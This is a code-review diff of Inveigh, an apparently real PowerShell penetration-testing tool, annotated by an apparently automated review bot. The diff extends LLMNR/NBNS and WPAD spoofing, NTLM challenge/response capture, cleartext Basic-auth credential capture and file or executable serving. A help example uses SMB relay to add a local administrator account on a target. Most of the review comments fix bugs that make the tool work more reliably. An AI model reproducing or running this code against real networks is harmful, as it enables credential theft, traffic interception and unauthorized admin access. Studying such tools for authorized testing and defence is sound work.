-Invoke-Inveigh -HTTP N -LLMNR N
+Invoke-Inveigh -HTTP N -LLMNR N -NBNS N
Execute with LLMNR/NBNS spoofing disabled and challenge/response capture over SMB only. This may be useful for capturing non-Kerberos authentication attempts on a file server.
.EXAMPLE
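Review bot: The rewritten example `Invoke-Inveigh -Repeat N -WPADAuth Anonymous ...` still uses `-Repeat`, which this same commit removes from the param block in favour of `-SpooferRepeat`; with `$invalid_parameter` collecting remaining arguments, running the example as written would throw "-Repeat N is not a valid parameter" (README.md line 27 also still advertises `-Repeat Y/N`). Change it to `Invoke-Inveigh -SpooferRepeat N -WPADAuth Anonymous -SpooferHostsReply host1,host2 -SpooferIPsReply 192.168.2.75,192.168.2.76`. The added `Invoke-Inveigh -Inspect` example also lacks its own `.EXAMPLE` header, so Get-Help will render it as a continuation of the previous example's description, and "inpect" in its explanation should read "inspect".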
@@ -117,7 +162,11 @@ Invoke-Inveigh -IP 192.168.1.10 -SpooferIP 192.168.2.50 -HTTP N
Execute specifying a specific local listening IP and a LLMNR/NBNS spoofing IP on another subnet. This may be useful for sending traffic to a controlled Linux system on another subnet.
.EXAMPLE
-Invoke-Inveigh -SMBRelay y -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Summer2015 /add && net localgroup administrators Dave /add"
+Invoke-Inveigh -HTTPResponse '<html><head><meta http-equiv="refresh" content="0; url=https://duckduckgo.com/"></head></html>'
+Execute specifying an HTTP redirect response.
+
+.EXAMPLE
+Invoke-Inveigh -SMBRelay y -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Winter2016 /add && net localgroup administrators Dave /add"
Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay target.
.EXAMPLE
@@ -139,43 +188,57 @@ https://github.com/mubix/post-exploitation/blob/master/scripts/mass_mimikatz/pow
8. Kerberos should downgrade for SMB authentication due to spoofed hostnames not being valid in DNS.
9. Ensure that the LMMNR,NBNS,SMB,HTTP ports are open within any local firewall on the host system.
10. If you copy/paste challenge/response captures from output window for password cracking, remove carriage returns.
-11. SMB relay support is experimental at this point, use caution if employing on a pen test.
.LINK
https://github.com/Kevin-Robertson/Inveigh
+
#>
-# Default parameter values can be modified below
+# Default parameter values can be modified in this section
param
(
- [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$IP = "",
- [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$SpooferIP = "",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$HTTP="Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$HTTPS="N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SMB="Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$LLMNR="Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$NBNS="N",
- [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][array]$NBNSTypes=@("00","20"),
- [parameter(Mandatory=$false)][array]$SpoofList="",
- [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][string]$Challenge="",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SMBRelay="N",
- [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$SMBRelayTarget ="",
- [parameter(Mandatory=$false)][array]$SMBRelayUsernames,
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SMBRelayAutoDisable="Y",
- [parameter(Mandatory=$false)][int]$SMBRelayNetworkTimeout="",
- [parameter(Mandatory=$false)][string]$SMBRelayCommand = "",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$Repeat="Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ForceWPADAuth="Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SpooferRepeat="Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ConsoleOutput="N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$FileOutput="N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$StatusOutput="Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$OutputStreamOnly="N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$MachineAccounts="N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ShowHelp="Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SMBRelay="N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SMBRelayAutoDisable="Y",
+ [parameter(Mandatory=$false)][ValidateSet("0","1","2")][string]$Tool="0",
+ [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][string]$HTTPAuth="NTLM",
+ [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][string]$WPADAuth="NTLM",
+ [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][array]$NBNSTypes=@("00","20"),
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$IP="",
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$SpooferIP="",
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$WPADIP = "",
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$SMBRelayTarget ="",
+ [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][string]$HTTPDir="",
[parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][string]$OutputDir="",
+ [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][string]$Challenge="",
+ [parameter(Mandatory=$false)][array]$SpooferHostsReply="",
+ [parameter(Mandatory=$false)][array]$SpooferHostsIgnore="",
+ [parameter(Mandatory=$false)][array]$SpooferIPsReply="",
+ [parameter(Mandatory=$false)][array]$SpooferIPsIgnore="",
+ [parameter(Mandatory=$false)][array]$SMBRelayUsernames="",
+ [parameter(Mandatory=$false)][int]$WPADPort="",
[parameter(Mandatory=$false)][int]$RunTime="",
- [parameter(Mandatory=$false)][ValidateSet("0","1","2")][string]$Tool="0",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ShowHelp="Y",
- [parameter(ValueFromRemainingArguments=$true)] $invalid_parameter
+ [parameter(Mandatory=$false)][int]$SMBRelayNetworkTimeout="",
+ [parameter(Mandatory=$false)][string]$HTTPBasicRealm="IIS",
+ [parameter(Mandatory=$false)][string]$HTTPDefaultFile="",
+ [parameter(Mandatory=$false)][string]$HTTPDefaultEXE="",
+ [parameter(Mandatory=$false)][string]$HTTPResponse="",
+ [parameter(Mandatory=$false)][string]$HTTPSCertThumbprint="76a49fd27011cf4311fb6914c904c90a89f3e4b2",
+ [parameter(Mandatory=$false)][string]$WPADResponse="",
+ [parameter(Mandatory=$false)][string]$SMBRelayCommand="",
+ [parameter(Mandatory=$false)][switch]$Inspect,
+ [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
)
if ($invalid_parameter)
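Review bot: The new `[array]$SpooferHostsReply=""`, `$SpooferHostsIgnore=""`, `$SpooferIPsReply=""`, `$SpooferIPsIgnore=""` and `$SMBRelayUsernames=""` defaults are one-element arrays containing an empty string, not empty arrays, so `.Count` is 1 and `-contains ""` is true for all of them; whether the spoofer's reply/ignore filtering treats that as "no filter" depends on code outside this diff and should be confirmed. `@()` as the default makes the intent explicit and survives either kind of check. The `$HTTPSCertThumbprint` default is the thumbprint of the bundled inveigh.pfx, whose private key ships with the repository; a comment on that line noting that the default cert is public and that HTTPS use should pass a per-engagement `-HTTPSCertThumbprint` would help operators who never read the help text.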
@@ -206,6 +269,36 @@ if($SMBRelay -eq 'y')
}
}
+if($SMBRelay -eq 'y' -and ($Challenge -or $HTTPDefaultFile -or $HTTPDefaultEXE -or $HTTPResponse -or $WPADIP -or $WPADPort -or $WPADResponse))
+{
+ Throw "-Challenge -HTTPDefaultFile, -HTTPDefaultEXE, -HTTPResponse, -WPADIP, -WPADPort, and -WPADResponse can not be used when enabling -SMBRelay"
+}
+elseif($SMBRelay -eq 'y' -and ($HTTPAuth -ne 'NTLM' -or $WPADAuth -eq 'Basic'))
+{
+ Throw "Only -HTTPAuth NTLM, -WPADAuth NTLM, and -WPAD Anonymous can be used when enabling -SMBRelay"
+}
+
+if($HTTPDefaultFile -or $HTTPDefaultEXE)
+{
+ if(!$HTTPDir)
+ {
+ Throw "You must specify an -HTTPDir when using either -HTTPDefaultFile or -HTTPDefaultEXE"
+ }
+}
+
+if($WPADIP -eq 'y' -or $WPADPort -eq 'y')
+{
+ if(!$WPADIP)
+ {
+ Throw "You must specify a -WPADPort to go with -WPADIP"
+ }
+
+ if(!$WPADPort)
+ {
+ Throw "You must specify a -WPADIP to go with -WPADPort"
+ }
+}
+
if(!$OutputDir)
{
$output_directory = $PWD.Path
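Review bot: The WPAD pairing check `if($WPADIP -eq 'y' -or $WPADPort -eq 'y')` can never be entered, because `$WPADIP` holds an address string and `$WPADPort` an int, neither of which compares equal to 'y'; a lone -WPADIP or -WPADPort therefore passes validation and later matches neither the `if($WPADIP -and $WPADPort)` branch nor the `elseif($WPADResponse -and !$WPADIP -and !$WPADPort)` branch, silently producing no WPAD response. The two inner messages are also inverted relative to their conditions. Suggested lines: `if($WPADIP -or $WPADPort)`, `if(!$WPADIP) { Throw "You must specify a -WPADIP to go with -WPADPort" }` and `if(!$WPADPort) { Throw "You must specify a -WPADPort to go with -WPADIP" }`. The combined-parameter message a few lines up is also missing a comma after `-Challenge`.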
@@ -221,11 +314,20 @@ if(!$inveigh)
$inveigh.log = New-Object System.Collections.ArrayList
$inveigh.NTLMv1_list = New-Object System.Collections.ArrayList
$inveigh.NTLMv2_list = New-Object System.Collections.ArrayList
+ $inveigh.cleartext_list = New-Object System.Collections.ArrayList
$inveigh.IP_capture_list = @()
$inveigh.SMBRelay_failed_list = @()
}
-$inveigh.running = $false
+if($inveigh.running)
+{
+ Throw "Invoke-Inveigh is already running, use Stop-Inveigh"
+}
+elseif($inveigh.relay_running)
+{
+ Throw "Invoke-InveighRelay is already running, use Stop-Inveigh"
+}
+
$inveigh.sniffer_socket = $null
if($inveigh.HTTP_listener.IsListening)
@@ -239,7 +341,8 @@ $inveigh.status_queue = New-Object System.Collections.ArrayList
$inveigh.log_file_queue = New-Object System.Collections.ArrayList
$inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList
$inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList
-$inveigh.certificate_thumbprint = "76a49fd27011cf4311fb6914c904c90a89f3e4b2"
+$inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList
+$inveigh.certificate_thumbprint = $HTTPSCertThumbprint
$inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList
$inveigh.console_output = $false
$inveigh.console_input = $true
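Review bot: `$inveigh.certificate_thumbprint = $HTTPSCertThumbprint` copies the user-supplied thumbprint without any format check, whereas `$Challenge` is guarded by a `[ValidatePattern]`; a mistyped value would presumably only surface when the HTTPS listener binds the certificate, which is outside this hunk. Since the parameter declaration lives in an earlier hunk, the fix belongs there, mirroring the Challenge pattern with the 40-hex-digit SHA-1 length: `[parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{40}$')][string]$HTTPSCertThumbprint="<existing default>"`.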
@@ -247,7 +350,13 @@ $inveigh.file_output = $false
$inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt"
$inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
$inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt"
-$Inveigh.challenge = $Challenge
+$inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt"
+$inveigh.HTTP_response = $HTTPResponse
+$inveigh.HTTP_directory = $HTTPDir
+$inveigh.HTTP_default_file = $HTTPDefaultFile
+$inveigh.HTTP_default_exe = $HTTPDefaultEXE
+$inveigh.WPAD_response = $WPADResponse
+$inveigh.challenge = $Challenge
$inveigh.running = $true
if($StatusOutput -eq 'y')
@@ -268,7 +377,16 @@ else
$inveigh.output_stream_only = $false
}
-if($Tool -eq 1) # Metasploit Interactive Powershell
+if($Inspect)
+{
+ $LLMNR = "N"
+ $NBNS = "N"
+ $HTTP = "N"
+ $HTTPS = "N"
+ $SMB = "N"
+}
+
+if($Tool -eq 1) # Metasploit Interactive PowerShell
{
$inveigh.tool = 1
$inveigh.output_stream_only = $true
@@ -313,12 +431,6 @@ else
$LLMNR_response_message = "- LLMNR spoofing is disabled"
}
-if($SpoofList -and ($LLMNR -eq 'y' -or $NBNS -eq 'y'))
-{
- $spoof_list_output = $SpoofList -join ","
- $inveigh.status_queue.add("Spoofing only $spoof_list_output")|Out-Null
-}
-
if($NBNS -eq 'y')
{
$NBNSTypes_output = $NBNSTypes -join ","
@@ -340,17 +452,46 @@ else
$NBNS_response_message = "- NBNS spoofing is disabled"
}
-if($Repeat -eq 'n')
+if($SpooferHostsReply -and ($LLMNR -eq 'y' -or $NBNS -eq 'y'))
{
- $inveigh.repeat = $false
- $inveigh.status_queue.add("Spoof Repeating Disabled")|Out-Null
+ $inveigh.status_queue.add("Spoofing requests for " + $SpooferHostsReply -join ",")|Out-Null
+}
+
+if($SpooferHostsIgnore -and ($LLMNR -eq 'y' -or $NBNS -eq 'y'))
+{
+ $inveigh.status_queue.add("Ignoring requests for " + $SpooferHostsIgnore -join ",")|Out-Null
+}
+
+if($SpooferIPsReply -and ($LLMNR -eq 'y' -or $NBNS -eq 'y'))
+{
+ $inveigh.status_queue.add("Spoofing requests from " + $SpooferIPsReply -join ",")|Out-Null
+}
+
+if($SpooferIPsIgnore -and ($LLMNR -eq 'y' -or $NBNS -eq 'y'))
+{
+ $inveigh.status_queue.add("Ignoring requests from " + $SpooferIPsIgnore -join ",")|Out-Null
+}
+
+if($SpooferRepeat -eq 'n')
+{
+ $inveigh.spoofer_repeat = $false
+ $inveigh.status_queue.add("Spoofer Repeating Disabled")|Out-Null
}
else
{
- $inveigh.repeat = $true
+ $inveigh.spoofer_repeat = $true
$inveigh.IP_capture_list = @()
}
+if($SMB -eq 'y')
+{
+ $inveigh.status_queue.add("SMB Capture Enabled")|Out-Null
+}
+else
+{
+ $inveigh.status_queue.add("SMB Capture Disabled")|Out-Null
+}
+
if($HTTP -eq 'y')
{
$inveigh.HTTP = $true
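Review bot: In the four new status lines such as `"Spoofing requests for " + $SpooferHostsReply -join ","`, the binary `-join` binds less tightly than `+`, so the concatenation runs first and the array is stringified with `$OFS` (a space by default) rather than the intended comma; the trailing `-join ","` then acts on a single string and changes nothing. Parenthesize the join, e.g. `$inveigh.status_queue.add("Spoofing requests for " + ($SpooferHostsReply -join ","))|Out-Null`, and likewise for the Ignoring/from variants. The removed SpoofList block avoided this by joining into `$spoof_list_output` first.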
@@ -389,32 +530,56 @@ else
$inveigh.status_queue.add("HTTPS Capture Disabled")|Out-Null
}
-if($Challenge)
+if($HTTPDir -and !$HTTPResponse)
{
- $inveigh.status_queue.add("NTLM Challenge = $Challenge")|Out-Null
+ $inveigh.status_queue.add("HTTP/HTTPS Directory = $HTTPDir")|Out-Null
+
+ if($HTTPDefaultFile)
+ {
+ $inveigh.status_queue.add("HTTP/HTTPS Default Response File = $HTTPDefaultFile")|Out-Null
+ }
+
+ if($HTTPDefaultEXE)
+ {
+ $inveigh.status_queue.add("HTTP/HTTPS Default Response Executable = $HTTPDefaultEXE")|Out-Null
+ }
}
-if($SMB -eq 'y')
+if($HTTPResponse)
{
- $inveigh.status_queue.add("SMB Capture Enabled")|Out-Null
+ $inveigh.status_queue.add("HTTP/HTTPS Custom Response Enabled")|Out-Null
}
-else
+
+if($HTTP -eq 'y' -or $HTTPS -eq 'y')
{
- $inveigh.status_queue.add("SMB Capture Disabled")|Out-Null
+ $inveigh.status_queue.add("HTTP/HTTPS Authentication = $HTTPAuth")|Out-Null
+ $inveigh.status_queue.add("WPAD Authentication = $WPADAuth")|Out-Null
}
-if($MachineAccounts -eq 'n')
+if($HTTPAuth -eq 'Basic' -or $WPADAuth -eq 'Basic')
{
- $inveigh.status_queue.add("Ignoring Machine Accounts")|Out-Null
+ $inveigh.status_queue.add("Basic Authentication Realm = $HTTPBasicRealm")|Out-Null
}
-if($ForceWPADAuth -eq 'y')
+if($WPADIP -and $WPADPort)
{
- $inveigh.status_queue.add("Force WPAD Authentication Enabled")|Out-Null
+ $inveigh.status_queue.add("WPAD = $WPADIP`:$WPADPort")|Out-Null
+ $inveigh.WPAD_response = "function FindProxyForURL(url,host){return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}"
}
-else
+elseif($WPADResponse -and !$WPADIP -and !$WPADPort)
+{
+ $inveigh.status_queue.add("WPAD Custom Response Enabled")|Out-Null
+ $inveigh.WPAD_response = $WPADResponse
+}
+
+if($Challenge)
{
- $inveigh.status_queue.add("Force WPAD Authentication Disabled")|Out-Null
+ $inveigh.status_queue.add("NTLM Challenge = $Challenge")|Out-Null
+}
+
+if($MachineAccounts -eq 'n')
+{
+ $inveigh.status_queue.add("Ignoring Machine Accounts")|Out-Null
}
if($ConsoleOutput -eq 'y')
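Review bot: `elseif($WPADResponse -and !$WPADIP -and !$WPADPort)` drops a custom -WPADResponse without any status message as soon as either -WPADIP or -WPADPort is also supplied, and when both are supplied the generated PAC string overwrites the `$inveigh.WPAD_response` that was assigned from `$WPADResponse` in an earlier hunk. Either reject the combination in the parameter-validation block, `if($WPADResponse -and ($WPADIP -or $WPADPort)) { Throw "-WPADResponse can not be used with -WPADIP or -WPADPort" }`, or add a status line stating that WPADIP/WPADPort take precedence so the operator is not left guessing which response is served.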
@@ -456,7 +621,6 @@ elseif($RunTime -gt 1)
if($SMBRelay -eq 'n')
{
-
if($ShowHelp -eq 'y')
{
$inveigh.status_queue.add("Use Get-Command -Noun Inveigh* to show available functions")|Out-Null
@@ -497,7 +661,7 @@ if($SMBRelay -eq 'n')
}
else
{
- Invoke-InveighRelay -HTTP $HTTP -HTTPS $HTTPS -SMBRelayTarget $SMBRelayTarget -SMBRelayUsernames $SMBRelayUsernames -SMBRelayAutoDisable $SMBRelayAutoDisable -SMBRelayNetworkTimeout $SMBRelayNetworkTimeout -MachineAccounts $MachineAccounts -SMBRelayCommand $SMBRelayCommand -Tool $Tool -ShowHelp $ShowHelp
+ Invoke-InveighRelay -HTTP $HTTP -HTTPS $HTTPS -HTTPSCertThumbprint $HTTPSCertThumbprint -WPADAuth $WPADAuth -SMBRelayTarget $SMBRelayTarget -SMBRelayUsernames $SMBRelayUsernames -SMBRelayAutoDisable $SMBRelayAutoDisable -SMBRelayNetworkTimeout $SMBRelayNetworkTimeout -MachineAccounts $MachineAccounts -SMBRelayCommand $SMBRelayCommand -Tool $Tool -ShowHelp $ShowHelp
}
# Begin ScriptBlocks
@@ -621,11 +785,10 @@ $SMB_NTLM_functions_scriptblock =
{
$inveigh.console_queue.add("SMB NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file)
}
-
}
}
- if (($inveigh.IP_capture_list -notcontains $source_IP) -and (-not $NTLM_user_string.EndsWith('$')) -and (!$inveigh.repeat) -and ($source_IP -ne $IP))
+ if (($inveigh.IP_capture_list -notcontains $source_IP) -and (-not $NTLM_user_string.EndsWith('$')) -and (!$inveigh.spoofer_repeat) -and ($source_IP -ne $IP))
{
$inveigh.IP_capture_list += $source_IP
}
@@ -637,7 +800,7 @@ $SMB_NTLM_functions_scriptblock =
# HTTP/HTTPS Server ScriptBlock - HTTP/HTTPS listener
$HTTP_scriptblock =
{
- param ($MachineAccounts,$ForceWPADAuth)
+ param ($HTTPAuth,$HTTPBasicRealm,$MachineAccounts,$WPADAuth)
Function NTLMChallengeBase64
{
@@ -647,10 +810,10 @@ $HTTP_scriptblock =
$HTTP_timestamp = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_timestamp))
$HTTP_timestamp = $HTTP_timestamp.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)}
- if($Inveigh.challenge)
+ if($inveigh.challenge)
{
- $HTTP_challenge = $Inveigh.challenge
- $HTTP_challenge_bytes = $Inveigh.challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-')
+ $HTTP_challenge = $inveigh.challenge
+ $HTTP_challenge_bytes = $inveigh.challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-')
$HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)}
}
else
@@ -685,7 +848,55 @@ $HTTP_scriptblock =
$inveigh.context = $inveigh.HTTP_listener.GetContext()
$inveigh.request = $inveigh.context.Request
$inveigh.response = $inveigh.context.Response
- $inveigh.message = ''
+
+ if($inveigh.HTTP_directory -and $inveigh.HTTP_default_EXE -and ($inveigh.request.RawUrl -like '*.exe') -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_EXE)) -and !(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl)))
+ {
+ [byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_EXE))
+ }
+ elseif($inveigh.HTTP_directory)
+ {
+ if(($inveigh.HTTP_default_file) -and !(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl)) -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file)) -and ($inveigh.request.RawUrl -notmatch '/wpad.dat'))
+ {
+ [byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file))
+ }
+ elseif(($inveigh.HTTP_default_file) -and ($inveigh.request.RawUrl -eq '/') -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file)))
+ {
+ [byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file))
+ }
+ elseif(($inveigh.WPAD_response) -and ($inveigh.request.RawUrl -match '/wpad.dat'))
+ {
+ [byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.WPAD_response)
+ }
+ else
+ {
+ if(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl))
+ {
+ [byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl))
+ }
+ else
+ {
+ [byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.HTTP_response)
+ }
+ }
+ }
+ else
+ {
+ if($inveigh.HTTP_response)
+ {
+ $inveigh.message = $inveigh.HTTP_response
+ }
+ elseif($inveigh.request.RawUrl -match '/wpad.dat')
+ {
+ $inveigh.message = $inveigh.WPAD_response
+ }
+ else
+ {
+ $inveigh.message = ''
+ }
+
+ [byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.message)
+ }
+
$NTLM = 'NTLM'
if($inveigh.request.IsSecureConnection)
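Review bot: The new file-serving branches join the client-controlled `$inveigh.request.RawUrl` onto `$inveigh.HTTP_directory` and read whatever `Test-Path` finds, with no check that the resolved path is still inside the served directory; RawUrl also carries any query string, which defeats the `Test-Path` lookups, and the unquoted `Test-Path` treats `[`, `*` and `?` as wildcards. Resolve the requested path once, verify it stays under the directory root, and use `-LiteralPath`, as sketched below. `$inveigh.HTTP_default_EXE` here versus `HTTP_default_exe` where it is assigned presumably relies on case-insensitive hashtable keys, so aligning the spelling would be clearer. The enclosing listener loop starts before this hunk.
```powershell
$inveigh.response = $inveigh.context.Response
# Resolve the request once; Url.AbsolutePath drops the query string that RawUrl carries.
$HTTP_directory_root = [System.IO.Path]::GetFullPath($inveigh.HTTP_directory).TrimEnd('\') + '\'
$HTTP_request_path = [System.IO.Path]::GetFullPath((Join-Path $HTTP_directory_root $inveigh.request.Url.AbsolutePath.TrimStart('/')))
$HTTP_request_in_root = $HTTP_request_path.StartsWith($HTTP_directory_root, [System.StringComparison]::OrdinalIgnoreCase)
# … unchanged: default EXE / default file / wpad.dat / fallback branches, with each
#   (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl)) replaced by
#   ($HTTP_request_in_root -and (Test-Path -LiteralPath $HTTP_request_path)) and the
#   matching ReadAllBytes call reading $HTTP_request_path …
```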
@@ -697,8 +908,7 @@ $HTTP_scriptblock =
$HTTP_type = "HTTP"
}
-
- if (($inveigh.request.RawUrl -match '/wpad.dat') -and ($ForceWPADAuth -eq 'n'))
+ if(($inveigh.request.RawUrl -match '/wpad.dat') -and ($WPADAuth -eq 'Anonymous'))
{
$inveigh.response.StatusCode = 200
}
@@ -706,6 +916,12 @@ $HTTP_scriptblock =
{
$inveigh.response.StatusCode = 401
}
+
+ if (!$inveigh.request.headers["Authorization"])
+ {
+ $inveigh.console_queue.add("$(Get-Date -format 's') - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address)
+ $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address)])
+ }
[string]$authentication_header = $inveigh.request.headers.getvalues('Authorization')
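Review bot: The request-received line in the new `if (!$inveigh.request.headers["Authorization"])` block is built twice, once for `console_queue` and once for `log_file_queue`, and the second `Get-Date` call can even stamp the two records with different times. Build it once, `$HTTP_request_message = "$(Get-Date -format 's') - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address`, and pass `$HTTP_request_message` to both `add` calls. The same duplicated-string pattern appears in the Basic auth branch of a later hunk.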
@@ -718,7 +934,7 @@ $HTTP_scriptblock =
if($HTTP_request_bytes[8] -eq 1)
{
$inveigh.response.StatusCode = 401
- $NTLM = NTLMChallengeBase64
+ $NTLM = NTLMChallengeBase64
}
elseif($HTTP_request_bytes[8] -eq 3)
{
@@ -767,7 +983,7 @@ $HTTP_scriptblock =
}
}
- if (($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address) -and (-not $HTTP_NTLM_user_string.EndsWith('$')) -and (!$inveigh.repeat))
+ if (($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address) -and (-not $HTTP_NTLM_user_string.EndsWith('$')) -and (!$inveigh.spoofer_repeat))
{
$inveigh.IP_capture_list += $inveigh.request.RemoteEndpoint.Address
}
@@ -789,11 +1005,10 @@ $HTTP_scriptblock =
if($inveigh.file_output)
{
$inveigh.console_queue.add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
- }
-
+ }
}
- if (($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address) -and (-not $HTTP_NTLM_user_string.EndsWith('$')) -and (!$inveigh.repeat))
+ if (($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address) -and (-not $HTTP_NTLM_user_string.EndsWith('$')) -and (!$inveigh.spoofer_repeat))
{
$inveigh.IP_capture_list += $inveigh.request.RemoteEndpoint.Address
}
@@ -807,12 +1022,37 @@ $HTTP_scriptblock =
{
$NTLM = 'NTLM'
}
-
}
-
- [byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.message)
+ elseif($authentication_header.startswith('Basic ')) # Thanks to @xorrior for the initial basic auth code
+ {
+ $inveigh.response.StatusCode = 200
+ $authentication_header = $authentication_header -replace 'Basic ',''
+ $cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($authentication_header))
+ $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from " + $inveigh.request.RemoteEndpoint.address)])
+ $inveigh.cleartext_file_queue.add($cleartext_credentials)
+ $inveigh.cleartext_list.add($cleartext_credentials)
+ $inveigh.console_queue.add("$(Get-Date -format 's') - Basic auth cleartext credentials $cleartext_credentials captured from " + $inveigh.request.RemoteEndpoint.address)
+
+ if($inveigh.file_output)
+ {
+ $inveigh.console_queue.add("Basic auth cleartext credentials written to " + $inveigh.cleartext_out_file)
+ }
+ }
+
+ if(($HTTPAuth -eq 'NTLM' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'NTLM' -and $inveigh.request.RawUrl -match '/wpad.dat'))
+ {
+ $inveigh.response.AddHeader("WWW-Authenticate",$NTLM)
+ }
+ elseif(($HTTPAuth -eq 'Basic' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Basic' -and $inveigh.request.RawUrl -match '/wpad.dat'))
+ {
+ $inveigh.response.AddHeader("WWW-Authenticate","Basic realm=$HTTPBasicRealm")
+ }
+ else
+ {
+ $inveigh.response.StatusCode = 200
+ }
+
$inveigh.response.ContentLength64 = $HTTP_buffer.length
- $inveigh.response.AddHeader("WWW-Authenticate",$NTLM)
$HTTP_stream = $inveigh.response.OutputStream
$HTTP_stream.write($HTTP_buffer, 0, $HTTP_buffer.length)
$HTTP_stream.close()
